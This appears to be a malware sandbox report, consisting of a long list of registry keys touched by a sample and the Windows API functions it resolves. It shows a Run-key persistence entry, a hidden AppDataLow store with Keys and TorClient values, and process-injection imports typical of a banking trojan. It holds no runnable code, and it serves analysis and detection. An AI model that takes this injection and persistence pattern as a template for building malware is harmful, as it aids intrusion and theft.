HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-dc-04-c0
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_LOCAL_MACHINE\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.WriteProcessMemory
kernel32.dll.HeapCreate
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
ntdll.dll.RtlNtStatusToDosError
ntdll.dll.NtUnmapViewOfSection
ntdll.dll.NtMapViewOfSection
ntdll.dll.memcpy
ntdll.dll.memset
ntdll.dll.ZwClose
ntdll.dll.NtCreateSection
ntdll.dll.mbstowcs
ntdll.dll.ZwOpenProcessToken
ntdll.dll.ZwOpenProcess
ntdll.dll.ZwQueryInformationToken
ntdll.dll.NtQuerySystemInformation
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.ZwQueryInformationProcess
ntdll.dll.RtlUpcaseUnicodeString
ntdll.dll.RtlUnwind
ntdll.dll.NtQueryVirtualMemory
shlwapi.dll.PathFindExtensionW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindExtensionA
shlwapi.dll.StrRChrA
shlwapi.dll.StrChrA
shlwapi.dll.StrStrIA
shlwapi.dll.StrTrimW
shlwapi.dll.StrChrW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathCombineW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiEnumDeviceInfo
setupapi.dll.SetupDiGetDeviceRegistryPropertyA
setupapi.dll.SetupDiGetClassDevsA
kernel32.dll.SetEvent
kernel32.dll.Sleep
kernel32.dll.GetExitCodeProcess
kernel32.dll.CreateProcessA
kernel32.dll.lstrlenW
kernel32.dll.GetLastError
kernel32.dll.GetProcAddress
kernel32.dll.ResetEvent
kernel32.dll.LoadLibraryA
kernel32.dll.lstrcmpiW
kernel32.dll.lstrcatW
kernel32.dll.DeleteFileW
kernel32.dll.CreateWaitableTimerA
kernel32.dll.SetFileAttributesW
kernel32.dll.SetWaitableTimer
kernel32.dll.GetModuleHandleA
kernel32.dll.HeapDestroy
kernel32.dll.GetCommandLineW
kernel32.dll.ExitProcess
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.WaitForSingleObject
kernel32.dll.CreateFileA
kernel32.dll.CreateEventA
kernel32.dll.GetVersion
kernel32.dll.lstrcmpA
kernel32.dll.GetTempPathA
kernel32.dll.GetTempFileNameA
kernel32.dll.CreateDirectoryA
kernel32.dll.GetFileSize
kernel32.dll.FreeLibrary
kernel32.dll.lstrcpynA
kernel32.dll.GetFileTime
kernel32.dll.FindNextFileA
kernel32.dll.FindClose
kernel32.dll.FindFirstFileA
kernel32.dll.CompareFileTime
kernel32.dll.GetModuleFileNameA
kernel32.dll.lstrcmpiA
kernel32.dll.SetLastError
kernel32.dll.GetModuleHandleW
kernel32.dll.LoadLibraryW
kernel32.dll.TerminateThread
kernel32.dll.GetVersionExW
kernel32.dll.VirtualAlloc
kernel32.dll.IsWow64Process
kernel32.dll.GetCurrentProcessId
kernel32.dll.CreateThread
kernel32.dll.OpenProcess
kernel32.dll.VirtualProtectEx
kernel32.dll.SuspendThread
kernel32.dll.ResumeThread
kernel32.dll.GetLongPathNameW
kernel32.dll.GetModuleFileNameW
kernel32.dll.lstrlenA
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.lstrcatA
kernel32.dll.lstrcpyA
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.LocalFree
kernel32.dll.SetEndOfFile
kernel32.dll.CreateDirectoryW
kernel32.dll.WriteFile
kernel32.dll.CreateFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.lstrcpyW
kernel32.dll.SetFilePointer
kernel32.dll.VirtualFree
user32.dll.DefWindowProcW
user32.dll.SendMessageW
user32.dll.GetSystemMetrics
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.SetClassLongW
user32.dll.SystemParametersInfoW
user32.dll.GetAncestor
user32.dll.GetWindowLongW
user32.dll.RegisterClassExW
user32.dll.GetForegroundWindow
user32.dll.TranslateMessage
user32.dll.GetMessageW
user32.dll.keybd_event
user32.dll.DestroyWindow
user32.dll.wsprintfW
user32.dll.wsprintfA
user32.dll.DispatchMessageW
user32.dll.GetCursorInfo
advapi32.dll.OpenProcessToken
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegOpenKeyW
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.RegSetValueExW
advapi32.dll.RegOpenKeyA
advapi32.dll.RegCreateKeyA
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorA
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegQueryValueExW
advapi32.dll.RegSetValueExA
advapi32.dll.RegQueryValueExA
shell32.dll.#92
shell32.dll.ShellExecuteW
shell32.dll.ShellExecuteExW
ole32.dll.CoUninitialize
ole32.dll.CoInitializeEx
wintrust.dll.WinVerifyTrust
user32.dll.FindWindowA
user32.dll.GetWindowThreadProcessId
kernel32.dll.Wow64EnableWow64FsRedirection
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
oleaut32.dll.#9
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ntdll.dll.ZwWow64QueryInformationProcess64
ntdll.dll.ZwWow64ReadVirtualMemory64
ntdll.dll.strcpy
ntdll.dll.NtResumeProcess
ntdll.dll.NtSuspendProcess
ntdll.dll._snprintf
ntdll.dll._wcsupr
ntdll.dll._strupr
ntdll.dll.memmove
ntdll.dll.wcscpy
ntdll.dll.ZwQueryKey
ntdll.dll.wcstombs
ntdll.dll.RtlImageNtHeader
ntdll.dll.RtlAdjustPrivilege
ntdll.dll.sprintf
ntdll.dll.wcscat
ntdll.dll.__C_specific_handler
ntdll.dll.__chkstk
kernel32.dll.GetComputerNameW
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.QueueUserWorkItem
kernel32.dll.SystemTimeToFileTime
kernel32.dll.GetLocalTime
kernel32.dll.RemoveDirectoryA
kernel32.dll.DeleteFileA
kernel32.dll.HeapReAlloc
kernel32.dll.GetCurrentThread
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.CopyFileW
kernel32.dll.GetCurrentThreadId
kernel32.dll.DuplicateHandle
kernel32.dll.SwitchToThread
kernel32.dll.MapViewOfFile
kernel32.dll.UnmapViewOfFile
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.OpenWaitableTimerA
kernel32.dll.OpenMutexA
kernel32.dll.WaitForMultipleObjects
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetVersionExA
kernel32.dll.InitializeCriticalSection
kernel32.dll.UnregisterWait
kernel32.dll.TlsGetValue
kernel32.dll.LoadLibraryExW
kernel32.dll.TlsSetValue
kernel32.dll.RegisterWaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.TlsAlloc
kernel32.dll.GetDriveTypeW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.WideCharToMultiByte
kernel32.dll.CreateFileMappingA
kernel32.dll.OpenFileMappingA
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.QueueUserAPC
kernel32.dll.OpenThread
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.CallNamedPipeA
kernel32.dll.WaitNamedPipeA
kernel32.dll.ConnectNamedPipe
kernel32.dll.GetOverlappedResult
kernel32.dll.DisconnectNamedPipe
kernel32.dll.CreateNamedPipeA
kernel32.dll.CancelIo
kernel32.dll.GetSystemTime
kernel32.dll.RemoveVectoredExceptionHandler
kernel32.dll.SleepEx
kernel32.dll.AddVectoredExceptionHandler
kernel32.dll.OpenEventA
kernel32.dll.LocalAlloc
kernel32.dll.RaiseException
kernel32.dll.FileTimeToSystemTime
kernel32.dll.DeleteCriticalSection
kernel32.dll.RemoveDirectoryW
kernel32.dll.FindNextFileW
kernel32.dll.FindFirstFileW
kernel32.dll.SetFilePointerEx
kernel32.dll.GetFileAttributesW
oleaut32.dll.#8
oleaut32.dll.#2
oleaut32.dll.#6
advapi32.dll.GetUserNameA
psapi.dll.EnumProcessModules
shlwapi.dll.StrToIntExA
shlwapi.dll.StrTrimA
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpQueryOption
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
secur32.dll.FreeContextBuffer
ncrypt.dll.SslOpenProvider
ncrypt.dll.GetSChannelInterface
bcryptprimitives.dll.GetHashInterface
ncrypt.dll.SslIncrementProviderReferenceCount
ncrypt.dll.SslImportKey
bcryptprimitives.dll.GetCipherInterface
ncrypt.dll.SslLookupCipherSuiteInfo
user32.dll.LoadStringW
ncrypt.dll.BCryptOpenAlgorithmProvider
ncrypt.dll.BCryptGetProperty
ncrypt.dll.BCryptCreateHash
ncrypt.dll.BCryptHashData
ncrypt.dll.BCryptFinishHash
ncrypt.dll.BCryptDestroyHash
crypt32.dll.CertGetCertificateChain
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
sechost.dll.ConvertStringSidToSidW
userenv.dll.RegisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceConfigW
